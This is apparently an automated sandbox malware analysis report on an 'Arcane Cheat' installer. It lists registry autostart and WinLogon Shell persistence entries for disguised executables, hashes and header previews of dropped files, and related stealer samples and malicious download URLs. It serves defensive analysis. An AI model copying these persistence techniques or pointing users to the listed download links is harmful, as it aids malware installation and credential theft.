            09:02:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Recovery\explorer.exe"
            09:02:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WinStore.App "C:\Surrogateprovidercomponentsessionmonitor\WinStore.App.exe"
            09:03:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
            09:03:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run audiodg "C:\Windows\addins\audiodg.exe"
            09:03:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRd "C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe"
            09:03:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Recovery\explorer.exe"
            09:03:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WinStore.App "C:\Surrogateprovidercomponentsessionmonitor\WinStore.App.exe"
            09:03:46AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Recovery\RuntimeBroker.exe"
            09:03:55AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run audiodg "C:\Windows\addins\audiodg.exe"
            09:04:06AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run qiOZcVoixJLcuAFKAnRd "C:\Program Files\Uninstall Information\qiOZcVoixJLcuAFKAnRd.exe"
            09:04:14AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Recovery\explorer.exe"
            09:04:24AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WinStore.App "C:\Surrogateprovidercomponentsessionmonitor\WinStore.App.exe"
            09:04:42AutostartRun: WinLogon Shell "C:\Recovery\RuntimeBroker.exe"

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            208.95.112.1SecuriteInfo.com.FileRepMalware.1834.13764.exeGet hashmaliciousDiscord Token Stealer, XWormBrowse
            • ip-api.com/line/?fields=hosting
            NFs_468.msiGet hashmaliciousVMdetectBrowse
            • ip-api.com/json/
            z23mypdfscanner-invoice3535.batGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            2aFb7hE00o.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            documentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            6743.pdf.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            W0Gtjt6n6J.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            VwjpUyPk2S.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
            • ip-api.com/json
            QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • ip-api.com/line/?fields=hosting
            HSBCR22022121218457670.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ip-api.comSecuriteInfo.com.FileRepMalware.1834.13764.exeGet hashmaliciousDiscord Token Stealer, XWormBrowse
            • 208.95.112.1
            NFs_468.msiGet hashmaliciousVMdetectBrowse
            • 208.95.112.1
            z23mypdfscanner-invoice3535.batGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            2aFb7hE00o.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            documentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            6743.pdf.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            W0Gtjt6n6J.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            VwjpUyPk2S.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
            • 208.95.112.1
            QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 208.95.112.1
            HSBCR22022121218457670.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            TUT-ASUSSecuriteInfo.com.FileRepMalware.1834.13764.exeGet hashmaliciousDiscord Token Stealer, XWormBrowse
            • 208.95.112.1
            NFs_468.msiGet hashmaliciousVMdetectBrowse
            • 208.95.112.1
            z23mypdfscanner-invoice3535.batGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            2aFb7hE00o.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            documentos.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            6743.pdf.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            W0Gtjt6n6J.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            VwjpUyPk2S.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
            • 208.95.112.1
            QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 208.95.112.1
            HSBCR22022121218457670.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1

            JA3 Fingerprints

            No context

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy)Advanced_IP_Scanner_2.5.4594.1 (1).exeGet hashmaliciousUnknownBrowse
              New Soft Update.exeGet hashmaliciousUnknownBrowse
                https://uceg-klom.us21.list-manage.com/track/click?u=9b882a29c7ab3b3f6381abd18&id=56bb8add24&e=4fba4902f9xGet hashmaliciousUnknownBrowse
                  https://cdn.discordapp.com/attachments/1174332456720154685/1174332513909477499/orderCase_21-50821.zipGet hashmaliciousUnknownBrowse
                    https://soft-got.host/vgc/NordVPN-10_11.zipGet hashmaliciousUnknownBrowse
                      C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy)Advanced_IP_Scanner_2.5.4594.1 (1).exeGet hashmaliciousUnknownBrowse
                        New Soft Update.exeGet hashmaliciousUnknownBrowse
                          https://uceg-klom.us21.list-manage.com/track/click?u=9b882a29c7ab3b3f6381abd18&id=56bb8add24&e=4fba4902f9xGet hashmaliciousUnknownBrowse
                            https://cdn.discordapp.com/attachments/1174332456720154685/1174332513909477499/orderCase_21-50821.zipGet hashmaliciousUnknownBrowse
                              https://soft-got.host/vgc/NordVPN-10_11.zipGet hashmaliciousUnknownBrowse

                                Created / dropped Files

                                C:\Program Files (x86)\Arcane Cheat\Arcane Cheat.exe (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):32768
                                Entropy (8bit):5.870513185862986
                                Encrypted:false
                                SSDEEP:384:UoI1gYZw33FUWUcC6TBhdsDgZH4o5NEvdlcn0ScPmPn0Avsl9EPg/s4Xsn+KvHKj:G7Zw33FNUf6Nhd/fQ1l+0vM0iT9
                                MD5:CA86297E7A02A2C1E91C4ECC897B7DCC
                                SHA1:A2E3EAE2DD5BAD41F349818F004DBE1BA89C1E89
                                SHA-256:8C3E900295AA5A4571719CCF6AC6739FEBFF2865755F1E75C38433C29283A67A
                                SHA-512:6613575793250F50C9A319B6F1CD758D9D74651B1AB1DA366A99D308C3384ECF4AD240A8AA14BC6D3C547DBE283FB8B9055AEDA73573CD784A8AA43C79B97C2E
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....VJf.................b........................@..........................P.......r....@... ..............................0.......@...............................................................................2...............................text....`.......b.................. .0`.data...@............f..............@.0..rdata...............h..............@.0@.bss....0.............................0..idata.......0.......n..............@.0..rsrc........@.......z..............@.0.................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\is-5H46A.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):32768
                                Entropy (8bit):5.870513185862986
                                Encrypted:false
                                SSDEEP:384:UoI1gYZw33FUWUcC6TBhdsDgZH4o5NEvdlcn0ScPmPn0Avsl9EPg/s4Xsn+KvHKj:G7Zw33FNUf6Nhd/fQ1l+0vM0iT9
                                MD5:CA86297E7A02A2C1E91C4ECC897B7DCC
                                SHA1:A2E3EAE2DD5BAD41F349818F004DBE1BA89C1E89
                                SHA-256:8C3E900295AA5A4571719CCF6AC6739FEBFF2865755F1E75C38433C29283A67A
                                SHA-512:6613575793250F50C9A319B6F1CD758D9D74651B1AB1DA366A99D308C3384ECF4AD240A8AA14BC6D3C547DBE283FB8B9055AEDA73573CD784A8AA43C79B97C2E
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....VJf.................b........................@..........................P.......r....@... ..............................0.......@...............................................................................2...............................text....`.......b.................. .0`.data...@............f..............@.0..rdata...............h..............@.0@.bss....0.............................0..idata.......0.......n..............@.0..rsrc........@.......z..............@.0.................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\is-8NKS2.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1197769
                                Entropy (8bit):6.370122940595945
                                Encrypted:false
                                SSDEEP:24576:eEZXjiinrzY5tO+uKE3LMT0jECZQEbLBDBEnFWsyb7xyxe:DdmbjTKlD00R5
                                MD5:4814AD2A8419A2C574930F6D70B6F76F
                                SHA1:DD09A6C66B6AE9F3194BE22A13FD353F020D809F
                                SHA-256:D51C94FA83722B0DD27869ECF539DA3E4A9DC4D6C30B01CCD6A2F37C632F17E2
                                SHA-512:4DAE11B817CA9529859E2A15DE0A8B7C7B3CC6A5572026A3C707505938F3374ACF522EC925EFBE0782CCB325BC6683E1111A21FDB1E21CB7C4FD6BE9323D784A
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 3%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......U..........................................@..............................................@..............................,8... ..............................................................................|................................text...$........................... ..`.itext.. ........................... ..`.data...<0.......2..................@....bss.....a...P...........................idata..,8.......:..................@....tls....<............X...................rdata...............X..............@..@.rsrc........ .......Z..............@..@....................................@..@........................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\COPYRIGHT (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ISO-8859 text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):3313
                                Entropy (8bit):4.557128068430301
                                Encrypted:false
                                SSDEEP:96:a58tiSm9iicC7CRRS9i7cq11iUDcsMLks0h9n:WOi59rcF/Cigq11iUD5MLks0z
                                MD5:FC605D978E7825595D752DF2EF03F8AF
                                SHA1:C493C9541CAAEE4BFE3B3E48913FD9DF7809299F
                                SHA-256:7D697EAA9ACF50FE0B57639B3C62FF02916DA184F191944F49ECA93D0BB3374F
                                SHA-512:FB811DE6A2B36B28CA904224EA3525124BD4628CA9618C70EB9234AB231A09C1B1F28D9B6301581A4FA2E20F1036D5E1C3D6F1BF316C7FE78EF6EDEAE50EA40E
                                Malicious:false
                                Preview:Copyright . 1993, 2016, Oracle and/or its affiliates...All rights reserved.....This software and related documentation are provided under a..license agreement containing restrictions on use and..disclosure and are protected by intellectual property laws...Except as expressly permitted in your license agreement or..allowed by law, you may not use, copy, reproduce, translate,..broadcast, modify, license, transmit, distribute, exhibit,..perform, publish, or display any part, in any form, or by..any means. Reverse engineering, disassembly, or..decompilation of this software, unless required by law for..interoperability, is prohibited.....The information contained herein is subject to change..without notice and is not warranted to be error-free. If you..find any errors, please report them to us in writing.....If this is software or related documentation that is..delivered to the U.S. Government or anyone licensing it on..behalf of the U.S. Government, the following notice is..applicable:...

                                C:\Program Files (x86)\Arcane Cheat\jre\LICENSE (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):41
                                Entropy (8bit):4.271470906740504
                                Encrypted:false
                                SSDEEP:3:c3AXFshzhRSkv:c9hzhgkv
                                MD5:67CB88F6234B6A1F2320A23B197FA3F6
                                SHA1:877ACEBA17B28CFFF3F5DF664E03B319F23767A1
                                SHA-256:263E21F4B43C118A8B4C07F1A8ACB11CAFC232886834433E34187F5663242360
                                SHA-512:4D43E5EDECAB92CEBD853204C941327DCCBFD071A71F066C12F7FB2F1B2DEF59C37A15CE05C4FE06EC2EA296B8630C4E938254A8A92E149E4A0A82C4307D648F
                                Malicious:false
                                Preview:Please refer to http://java.com/license..

                                C:\Program Files (x86)\Arcane Cheat\jre\README.txt (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):47
                                Entropy (8bit):4.2563005536211715
                                Encrypted:false
                                SSDEEP:3:c3AXFshzhRSkjn:c9hzhgkjn
                                MD5:4BDA1F1B04053DCFE66E87A77B307BB1
                                SHA1:B8B35584BE24BE3A8E1160F97B97B2226B38FA7D
                                SHA-256:FD475B1619675B9FB3F5CD11D448B97EDDEE8D1F6DDCCA13DED8BC6E0CAA9CF3
                                SHA-512:997CEE676018076E9E4E94D61EC94D5B69B148B3152A0148E70D0BE959533A13AD0BC1E8B43268F91DB08B881BF5050A6D5C157D456597260A2B332A48068980
                                Malicious:false
                                Preview:Please refer to http://java.com/licensereadme..

                                C:\Program Files (x86)\Arcane Cheat\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):111645
                                Entropy (8bit):4.8590909329531025
                                Encrypted:false
                                SSDEEP:1536:iiVRF8bLuepEvc5O5YwT3JJ4WOHHA/AFjrlHyEepdfZ9JIH4gDq:dRMiCOjJJ4pg/0Hx9MlZ9KH47
                                MD5:0E05BD8B9BFCF17F142445D1F8C6561C
                                SHA1:CF0A9F4040603008891AA0731ABF89CE2403F2FB
                                SHA-256:C3EA3996241B8E9AE7DB3780E470174076FD2003D8AEFAA77BF0BAB5E04DE050
                                SHA-512:07C7865D31D22BA0C68E384AFEDC22261F7B3A82BEBC9324145FF7F631623ECA2DC31C71CDBBFC9FEBC1733451A095302DE2A0877821A5B68038E350969BF460
                                Malicious:false
                                Preview:.DO NOT TRANSLATE OR LOCALIZE....***************************************************************************....%%The following software may be included in this product:..Microsoft DirectShow - Base Classes....Use of any of this software is governed by the terms of the license below:....MSDN - Information on Terms of Use....Updated: February 13, 2008....ON THIS PAGE.... * ACCEPTANCE OF TERMS.. * PRIVACY AND PROTECTION OF PERSONAL INFORMATION.. * NOTICE SPECIFIC TO APIs AVAILABLE ON THIS WEB SITE.. * NOTICE SPECIFIC TO SOFTWARE AVAILABLE ON THIS WEB SITE.. * NOTICE SPECIFIC TO DOCUMENTATION AVAILABLE ON THIS WEB SITE.. * NOTICES REGARDING SOFTWARE, DOCUMENTATION, APIS AND SERVICES AVAILABLE ON..THIS WEB SITE.. * RESERVATION OF RIGHTS.. * MEMBER ACCOUNT, PASSWORD, AND SECURITY.. * NO UNLAWFUL OR PROHIBITED USE.. * USE OF SERVICES.. * MATERIALS PROVIDED TO MICROSOFT OR POSTED AT ANY MICROSOFT WEB SITE.. * NOTICES AND PROCEDURE FOR MAKING CLAIMS OF COP

                                C:\Program Files (x86)\Arcane Cheat\jre\THIRDPARTYLICENSEREADME.txt (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):180668
                                Entropy (8bit):5.064180003233063
                                Encrypted:false
                                SSDEEP:3072:54ct+BcF1N7m8arf1kHRSusX2NyJ9KH4PF4j52eTjLAzE7GzmCK+XNhalQxkM8QB:N7mtrf1GhMF4j5RMGQoyzaXmR
                                MD5:0E87879F452892B85C81071A1DDD5A2A
                                SHA1:2CF97C1A84374A6FBBD5D97FE1B432FA799C3B19
                                SHA-256:9C18836FD0B5E4B0C57CFFDB74574FA5549085C3B327703DC8EFE4208F4E3321
                                SHA-512:10BA68FFD9DEAB10A0B200707C3AF9E95E27AED004F66F049D41310CB041B7618EE017219C848912D5951599208D385BCB928DD33175652101C7E5BC2E3EBA5B
                                Malicious:false
                                Preview:DO NOT TRANSLATE OR LOCALIZE...-----------------------------....%% This notice is provided with respect to ASM Bytecode Manipulation ..Framework v5.0.3, which may be included with JRE 8, and JDK 8, and ..OpenJDK 8.....--- begin of LICENSE ---....Copyright (c) 2000-2011 France T.l.com..All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions..are met:....1. Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer.....2. Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution.....3. Neither the name of the copyright holders nor the names of its.. contributors may be used to endorse or promote products derived from.. this software without specific prior written

                                C:\Program Files (x86)\Arcane Cheat\jre\Welcome.html (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:HTML document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):983
                                Entropy (8bit):5.135635144562017
                                Encrypted:false
                                SSDEEP:24:+STATDcxWpAVjXQ5cjaJ2gjQo4OSED6R8R/TtDpM:+STATD7pqjXBeJdso4OnxRc
                                MD5:3CB773CB396842A7A43AD4868A23ABE5
                                SHA1:ACE737F039535C817D867281190CA12F8B4D4B75
                                SHA-256:F450AEE7E8FE14512D5A4B445AA5973E202F9ED1E122A8843E4DC2D4421015F0
                                SHA-512:6058103B7446B61613071C639581F51718C12A9E7B6ABD3CF3047A3093C2E54B2D9674FAF9443570A3BB141F839E03067301FF35422EB9097BD08020E0DD08A4
                                Malicious:false
                                Preview:<html>..<head>..<title>..Welcome to the Java(TM) Platform..</title>..</head>..<body>....<h2>Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Platform</h2>..<p> Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Standard Edition Runtime .. Environment. This provides complete runtime support for Java applications. ..<p> The runtime environment includes the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> .. Plug-in product which supports the Java environment inside web browsers. ..<h3>References</h3>..<p>..See the <a href="http://download.oracle.com/javase/7/docs/technotes/guides/plugin/">Java Plug-in</a> product..documentation for more information on using the Java Plug-in product...<p> See the <a href=.."http://www.oracle.com/technetwork/java/javase/overview/"..>Java Platform</a> web site for .. more information on the Java Platform. ..<hr>..<font size="-2">..Copyright (c) 2006, 2016, Oracle and/or its affiliates. All rights reserved...</font>..<p>..</body>..</html>..

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge-32.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):14912
                                Entropy (8bit):6.141852308272967
                                Encrypted:false
                                SSDEEP:192:7pQMhM63XLPVT6MsMPapRuBUEp7nYe+PjPriT0fwtK:7muL7PV4aapRuBTp7nYPLr7J
                                MD5:D63933F4E279A140CC2A941CCFF38348
                                SHA1:75169BE2E9BCFE20674D72D43CA6E2BC4A5A9382
                                SHA-256:532D049E0D7A265754902C23B0F150D665A78A3D6FE09AD51C9BE8C29D574A3D
                                SHA-512:D7A5023A5EB9B0C3B2AD6F55696A166F07FA60F9D1A12D186B23AAAACC92EF948CB5DFFA013AFC90C4BBE3DE077D591185902384F677D0BAE2FF7CFD5DB5E06C
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Joe Sandbox View:
                                • Filename: Advanced_IP_Scanner_2.5.4594.1 (1).exe, Detection: malicious, Browse
                                • Filename: New Soft Update.exe, Detection: malicious, Browse
                                • Filename: , Detection: malicious, Browse
                                • Filename: , Detection: malicious, Browse
                                • Filename: , Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.Z.[.Z.[.Z.[.A<..[.[.A<..Q.[.A<.._.[.S...X.[.Z.Z.D.[.A<..Y.[.A<..[.[.A<..[.[.A<..[.[.RichZ.[.................PE..L...yPjW...........!......................... .....m.........................`......em....@.........................`%......,"..P....@..x............"..@....P.. .... ............................... ..@............ ...............................text............................... ..`.rdata..d.... ......................@..@.data...`....0......................@....rsrc...x....@......................@..@.reloc..^....P....... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\JAWTAccessBridge.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):14912
                                Entropy (8bit):6.1347115439165085
                                Encrypted:false
                                SSDEEP:192:0Usw4DPU3XLPVT6GsKOhWIutUinYe+PjPriT0fwyI8:ew7PVIKyWIutDnYPLr728
                                MD5:B4EB9B43C293074406ADCA93681BF663
                                SHA1:16580FB7139D06A740F30D34770598391B70AC96
                                SHA-256:8CD69AF7171F24D57CF1E6D0D7ACD2B35B4EA5FDF55105771141876A67917C52
                                SHA-512:A4E999E162B5083B6C6C3EAFEE4D84D1EC1C61DCA6425F849F352FFDCCC2E44DFEE0625C210A8026F9FF141409EEBF9EF15A779B26F59B88E74B6A2CE2E82EF9
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Joe Sandbox View:
                                • Filename: Advanced_IP_Scanner_2.5.4594.1 (1).exe, Detection: malicious, Browse
                                • Filename: New Soft Update.exe, Detection: malicious, Browse
                                • Filename: , Detection: malicious, Browse
                                • Filename: , Detection: malicious, Browse
                                • Filename: , Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........5.Z.[.Z.[.Z.[.A<..[.[.A<..Q.[.A<.._.[.S...X.[.Z.Z.D.[.A<..Y.[.A<..[.[.A<..[.[.A<..[.[.RichZ.[.................PE..L...zPjW...........!......................... .....m.........................`.......2....@.........................`%......,"..P....@..p............"..@....P.. .... ............................... ..@............ ...............................text............................... ..`.rdata..a.... ......................@..@.data...`....0......................@....rsrc...p....@......................@..@.reloc..^....P....... ..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge-32.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):128064
                                Entropy (8bit):6.428684952829155
                                Encrypted:false
                                SSDEEP:3072:uN77TJSG78+5Orcj5K/e2Hrgc6kZAn1yEkBKMKy1Zf22QYHJiuzTl8ShzzM+64mn:uNXd178+5fJZnQLo
                                MD5:2F808ED0642BD5CF8D4111E0AF098BBB
                                SHA1:006163A07052F3D227C2E541691691B4567F5550
                                SHA-256:61DFB6126EBA8D5429F156EAAB24FF30312580B0ABE4009670F1DD0BC64F87BB
                                SHA-512:27DBDA3A922747A031FF7434DE5A596725FF5AE2BC6DD83D6D5565EB2BA180B0516896323294459997B545C60C9E06DA6C2D8DD462A348A6759A404DB0F023A7
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[d.@:.N@:.N@:.N[..NB:.N[..NB:.N[..NK:.NIB.NE:.N@:.N{:.N[..NG:.N[..NA:.N[..NA:.N[..NA:.NRich@:.N........PE..L...rPjW...........!................#..............m................................p.....@.........................p...........P.......x...............@...........................................p...@............................................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...x...........................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\JavaAccessBridge.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):127552
                                Entropy (8bit):6.413283221897154
                                Encrypted:false
                                SSDEEP:3072:SdQ4jWJt4XChlFavveKSQ4gHK/e2Hrgc6kZAn1y1koKMKy1Zf22QYHJiuzTl8ShM:Sy4SJ1TFavvehc7ZnwEr
                                MD5:C3DED5F41E28FAF89338FB46382E4C3E
                                SHA1:6F77920776D39550355B146D672C199A3941F908
                                SHA-256:4691603DFABE6D7B7BEAC887DADC0E96243C2FF4F9A88CE3793E93356C53AA08
                                SHA-512:23621F2856899F40CFA9858DC277372BFE39F0205377543EB23E94422D479A53FDF664F4A9A4515C2285811F01D91AB64A834A03A4D3AB0CB7D78F8AF11135FF
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[d.@:.N@:.N@:.N[..NB:.N[..NB:.N[..NK:.NIB.NE:.N@:.N{:.N[..NG:.N[..NA:.N[..NA:.N[..NA:.NRich@:.N........PE..L...sPjW...........!...............................m......................................@.........................@...........P.......p...............@...........................................H...@............................................text...n........................... ..`.rdata..............................@..@.data...............................@....rsrc...p...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge-32.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):97856
                                Entropy (8bit):6.467907542894502
                                Encrypted:false
                                SSDEEP:1536:/fHGbDtpt+WfGegcX30EJ4YHiYmRkgAPe+GP8uWg1kQOPt:/w2WfGe/30EWbY4Z+GpWuHOPt
                                MD5:F78D2BF2C551BE9DF6A2F3210A2964C1
                                SHA1:B6A4160ECA4C0D0552234FF69BCFDF45F0A2A352
                                SHA-256:9D18E5421A8606985FA54D7CEA921D1B8930358A2E4CDF5FDF2A8B3E4D857288
                                SHA-512:AAC8622683BE57518F8B03198A03BF1F760E082692C1FB6252E96CDBA19D3CEB0A6786CCBD7B98830E865297308FA99DBBEA464E41041ABDDA18AEB862BA993F
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./zR/k.<|k.<|k.<|p..|{.<|p..|2.<|bc.|n.<|k.=|7.<|p..|O.<|p..|j.<|p..|j.<|p..|j.<|Richk.<|........................PE..L...pPjW...........!................At.............p................................7P....@..........................9..A....1..<....................f..@............................................,..@...............@............................text...\........................... ..`.rdata..Qg.......h..................@..@.data...`,...P.......8..............@....rsrc................F..............@..@.reloc..J............N..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\WindowsAccessBridge.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):95808
                                Entropy (8bit):6.48897048228647
                                Encrypted:false
                                SSDEEP:1536:EHSB4i2hJwZaDEoDVzkhbyJCAqn9nV+1vkJnHBoY8BK5Hj:EJJwZWEoDVYby81yiBovkHj
                                MD5:E5A6231FE1E6FEC5F547DFD845D209BC
                                SHA1:3F21F90ECC377B6099637D5B59593D2415450D45
                                SHA-256:51355EA8A7DC238483C8069361776103779CE9FE3CD0267770E321E6E4368366
                                SHA-512:D5D20DF0089F3217B627D39ABD57C61E026D0DC537022FB698F85FA6893C7FA348C40295DEEC78506F0EF608827D39E2F6F3538818BA25E2A0EE1145FCC95940
                                Malicious:false
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                • Antivirus: Virustotal, Detection: 0%, Browse
